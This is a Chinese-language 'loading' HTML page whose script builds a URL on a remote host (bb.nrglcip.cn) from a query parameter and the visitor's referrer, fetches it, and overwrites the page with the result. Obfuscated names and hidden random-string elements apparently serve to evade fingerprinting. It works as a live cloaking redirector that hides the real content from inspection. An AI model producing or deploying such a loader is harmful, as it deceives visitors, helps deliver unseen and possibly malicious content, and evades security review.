<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cAsTXc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cAsTXc .uRMT5mH3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cAsTXc .content {
            line-height: 50px;
            text-align: center
        }

        .cAsTXc .img {
            width: 100%
        }

        .cAsTXc .SFnE2eCNG {
            text-align: center
        }

        .cAsTXc .SFnE2eCNG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cAsTXc .SFnE2eCNG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cAsTXc .SFnE2eCNG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cAsTXc .SFnE2eCNG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cAsTXc .SFnE2eCNG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cAsTXc .SFnE2eCNG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cAsTXc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yBzpZI53ym522(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gs8y2 = yBzpZI53ym522('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gs8y2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gs8y2 +".html?a=share";
		}
		
        Mtv9yIV=url+"#"+new Date().getTime();
        Mtv9yIV && function() {
            $.get(Mtv9yIV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>hI256XF4dkCvH5xhEHaMXL0</p>
<li style='display:none' >uTFY1Zhx1OIjXg0wXyQbprtafjWaFUclBEdlWgUI6GY7TGIs6yK</li>
<div style='display:none'>nTLSLgbq3ssq8RXs2nsvvzbS8ykyOmC73WlOBL6y9dbxqQTcmvibRp</div><div class="cAsTXc">
    <div class="uRMT5mH3">
        <div class="SFnE2eCNG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>RoXukVq2TWOnbVKMqKTZRe1bBG5srEUB0nKUbWW524Q2qUfrdAP0EJ84RAa1TAvjRPSHRYoRP</span>
<li style='display:none' >fYyyuclh8H6PFidFyK5jjBXLvipR9cO7Wems5RQ3dDr</li>
<a  href='#' style='display:none'>VlnMwdiZALtVq1f3wR9zi6qIq</a>
<div style='display:none'>s6W7UtVKVntSzDwOOqQqDlfPAUYTCQKPpWrSW7e3</div>
<h1 style='display:none' >PHo8dBgGFlD3QTBJItC5MBphE6JQp</h1>
<h1 style='display:none' >PHo8dBgGFlD3QTBJItC5MBphE6JQp</h1>
<b style='display:none' >XPx55oJKUBtIXWuBmDNqu6SbT7NjtPPXDJonzqIlNY1odg8zoPYcKIPjj5vhte8ss34iSBYZ</b>
<div style='display:none'>s6W7UtVKVntSzDwOOqQqDlfPAUYTCQKPpWrSW7e3</div>
<h1 style='display:none' >PHo8dBgGFlD3QTBJItC5MBphE6JQp</h1></body>
</html>